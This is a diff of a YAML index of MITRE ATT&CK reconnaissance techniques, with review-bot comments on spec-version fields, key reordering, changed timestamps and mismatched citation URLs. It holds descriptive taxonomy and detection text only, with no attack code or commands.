atomic_tests: []
T1596:
technique:
@@ -61714,7 +62409,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
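Review bot: T1596 here (and T1589.002, T1598.004 and T1593.003 further down) lose only `spec_version: '2.1'` and keep their `x_mitre_attack_spec_version` (2.1.0, 2.1.0, 3.1.0 and 3.0.0 respectively), while T1590.005, T1596.002, T1596.001 and the other regressed-timestamp objects lose both keys. If the generator copies `x_mitre_attack_spec_version` straight from the STIX object, the objects that lose it presumably come from an older bundle that predates the field; document that, or backfill the field, so the index does not mix objects with and without a spec version.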
@@ -61740,7 +62434,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -61761,8 +62455,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -61827,7 +62519,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -61875,7 +62566,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -61897,7 +62587,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -61913,34 +62603,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -61949,15 +62615,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
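Review bot: the `SecurityTrails Google Hacking` reference now points at `https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks` while its `source_name` and description still read `Borges, E. (2019, March 5). Exploring Google Hacking Techniques`, so the citation text no longer matches the URL (different site, different title, and the retrieved date is now 2024). Either update the author, title and date to what the Recorded Future page shows, or keep the original securitytrails.com URL behind a web.archive.org snapshot as this patch already does for the ACSC and OPM references.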
@@ -61979,7 +62668,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -61995,8 +62684,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
@@ -62057,29 +62744,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
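Review bot: the T1589.003 description in the trailing context line still reads `Employee names be used to derive email addresses`, missing the `may`. This is MITRE's text, so it should not be patched in the index (the next regeneration would overwrite it), but it is worth an upstream report; nothing else in this hunk needs changing.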
@@ -62088,15 +62756,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
@@ -62122,7 +62809,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -62140,47 +62827,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -62189,19 +62839,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
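Review bot: most of this hunk, taken together with the removal block in the preceding hunk, is the same data with keys in a different order: the platforms, domains, contributors, id/type/created and external_references entries reappear verbatim. The substantive changes are the ACSC url moving to a web.archive.org snapshot, `revoked: false` and `x_mitre_deprecated: false` being added, and `modified` advancing to 2024-05-31. Consider having the generator emit keys in a fixed order (for example, sorting keys on dump) so that regenerations produce diffs limited to real changes; the same reorder noise recurs in the T1593, T1597 and T1595.001 hunks below.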
@@ -62224,7 +62910,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -62240,8 +62926,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
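Review bot: unlike T1592.004 above, where `x_mitre_attack_spec_version` is re-added as 3.2.0, this object loses the field outright: `x_mitre_attack_spec_version: 2.1.0` is removed at the end of the object and no hunk re-adds it. The same happens for T1591, T1590, T1592.003, T1592.002, T1593.001, T1591.004, T1596.005, T1591.001 and T1598.001 below, while T1595.003 and T1590.001 keep a 2.1.0 value in place, so any consumer reading `technique.x_mitre_attack_spec_version` must now treat the key as optional. The removed keys always sit after `x_mitre_modified_by_ref`, whereas the kept value in T1595.003 sits before it, which suggests the old generator appended defaults for objects that lacked the field; if so the removal is correct, but it deserves a sentence in the PR description.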
@@ -62267,7 +62951,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -62283,8 +62967,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -62312,7 +62994,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -62328,12 +63010,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -62342,16 +63022,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -62364,8 +63044,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
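Review bot: the `SecurityTrails Google Hacking` entry now points at https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks while `source_name` and the description (Borges, E. (2019, March 5). Exploring Google Hacking Techniques.) still credit SecurityTrails and the original title; only the retrieved date was updated. If this mirrors an upstream ATT&CK change there is nothing to fix in this repo, but a reader following the citation will land on a different host and title than the description states, so please confirm it is the migrated copy of the same article rather than an unrelated page.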
@@ -62376,52 +63056,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
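Review bot: the description edit drops `(Citation: D3Secutrity CTI Feeds)` (note the misspelled key) and the matching `D3Secutrity CTI Feeds` external reference is removed in the same hunk, so no dangling citation remains, and the `x_mitre_version` bump from 1.0 to 1.1 matches the text change. The sentence about reputable paid feeds is now uncited in the source data; the remaining lines of this hunk are the same key reordering seen elsewhere in the diff rather than content changes.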
@@ -62443,7 +63121,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -62459,8 +63137,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
@@ -62486,7 +63162,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -62504,8 +63180,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -62527,7 +63201,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -62543,12 +63217,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -62558,17 +63230,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
